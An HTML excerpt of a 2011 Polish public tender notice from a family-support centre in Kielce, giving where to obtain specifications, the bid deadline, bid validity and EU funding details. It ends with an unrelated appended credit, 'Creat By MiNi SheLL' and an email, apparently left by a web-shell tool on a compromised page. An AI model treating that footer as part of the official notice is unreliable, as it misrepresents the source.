<p>Wszystkie istotne postanowienia umowy o udzielenie zamówienia publicznego zawarto we wzorze, który stanowi załącznik nr 5 do SIWZ. Zamawiający na podstawie art. 144 ust.1 ustawy PZP - zastrzega sobie prawo do zmiany treści istotnych postanowień umowy: - w zakresie zmiany liczby uczestników z przyczyn niezależnych od zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Kielcach Punkt Konsultacyjno Doradczy dla osób niepełnosprawnych ul. Okrzei 18, IV piętro, lok. 10, 25-516 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 13:30, miejsce: Powiatowe Centrum Pomocy Rodzinie w Kielcach Punkt Konsultacyjno Doradczy dla osób niepełnosprawnych ul. Okrzei 18, IV piętro, lok. 10, 25-516 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com